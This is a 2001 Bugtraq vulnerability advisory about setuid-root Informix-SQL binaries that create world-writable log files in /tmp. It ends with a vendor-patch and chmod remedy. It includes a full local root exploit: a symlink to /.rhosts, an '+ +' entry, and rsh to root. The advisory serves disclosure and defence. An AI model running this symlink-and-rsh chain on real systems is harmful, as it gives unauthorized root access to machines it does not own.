[ Hackerslab bug_paper ] Informix-SQL application vulnerability

From: s96192@ce.hannam.ac.kr
Date: 09/04/01 

Date: Tue, 4 Sep 2001 22:18:47 +0900 (KST)
Message-Id: <200109041318.f84DIlg16535@ce.hannam.ac.kr>
From: s96192@ce.hannam.ac.kr
To: bugtraq@securityfocus.com
Subject: [ Hackerslab bug_paper ] Informix-SQL application vulnerability

==============================================================================

       [ Hackerslab bug_paper ] Informix-SQL application vulnerability

==============================================================================

File : Informix-SQL application

SYSTEM : Systems running Informix

INFO :

There is a vulneribility in informix-SQL application which allows local
users to create any file with root privilege:

PART 1 :
$ id
uid=500 (informix) gid=120 (informix) groups=1000(loveyou)
$ umask 0000
$ cd ~informix/bin (Informix HOME Directory)
$ ./onshowaudit
INFORMIX-SQL Version 7.31.UC5
$ ls -al onbar_d ondblog onsmsync onsrvapd
-rwsr-sr-x 1 root informix 2234104 Nov 18 1999 onbar_d
-rwsr-sr-x 1 root informix 2219456 Nov 18 1999 ondblog
-rwsr-sr-x 1 root informix 2284972 Apr 10 2000 onsmsync
-rwsr-sr-x 1 root informix 39144 Nov 18 1999 onsrvapd

$ ./onbar_d or ./ondblog or ./onsmsync
$ ls -al /tmp/bar*
-rw-rw---- 1 root informix 557 Aug 29 17:26 /tmp/bar_act.log
-rw-rw---- 1 root informix 0 Aug 29 17:26 /tmp/bar_dbug.log

PART 2:
$ ./onsrvapd
$ ls -al /tmp/ons*
-rw-rw-rw- 1 root informix 141 Aug 29 17:38 /tmp/onsnmp.(hostname).log
-rw-rw-rw- 1 informix informix 319 Aug 29 17:38 /tmp/onsrvapd.log

PART 3:

$ ./snmpdm
$ ls -al /tmp/snmpd.log
-rwxrwxrwx 1 root root 1085 Aug 29 17:43 /tmp/snmpd.log

PART 4:
loveyou@dogfoot$ ln -s /.rhosts /tmp/onsbmp.dogfoot.log
loveyou@dogfoot$ ~informix/bin/onsrvapd &
loveyou@dogfoot$ ls -al /.rhosts
-rw-rw-rw- 1 root informix 141 Aug 29 18:28 /.rhosts
loveyou@dogfoot$ echo "+ +" > /.rhosts
loveyou@dogfoot$ rsh -l root localhost csh -i
# whoami
root

SOLUTION :

remove setuid permition, contact your vendor and get a patch.
$ su -
# cd ~informix/bin (Informix HOME Directory)
# chmod o-s onbar_d ondblog onsmsync onsrvapd

==-------------------------------------------------------------------------------==
       ********
   * ** ** *
 * ** ** *
* ****** * Kim Yong-Jun
 * ** ** * loveyou@hackerslab.org
   * ** ** * [ http://www.hackerslab.org ]
       ******** HACKERSLAB (C) since 1999
==-------------------------------------------------------------------------------==

Relevant Pages

  • Re: [ Hackerslab bug_paper ] Informix-SQL application vulnerability
    ... Informix-SQL application vulnerability ... of the programs in $INFORMIXDIR/bin were owned by root and setuid ... > rw-rw-rw which isn't good (and why you shouldn't SET umask to 0000. ... so I couldn't edit it afterwards, but I could nonetheless overwrite it. ...
    (Bugtraq)
  • Re: secleanup not working
    ... i copied secleanup to /usr/informix/bin and got the same error. ... Engine Process Cleanup and Synchronisation Utility ... INFORMIX-SQL Version 7.25.UC3 ... when I run the command as root i get the error. ...
    (comp.databases.informix)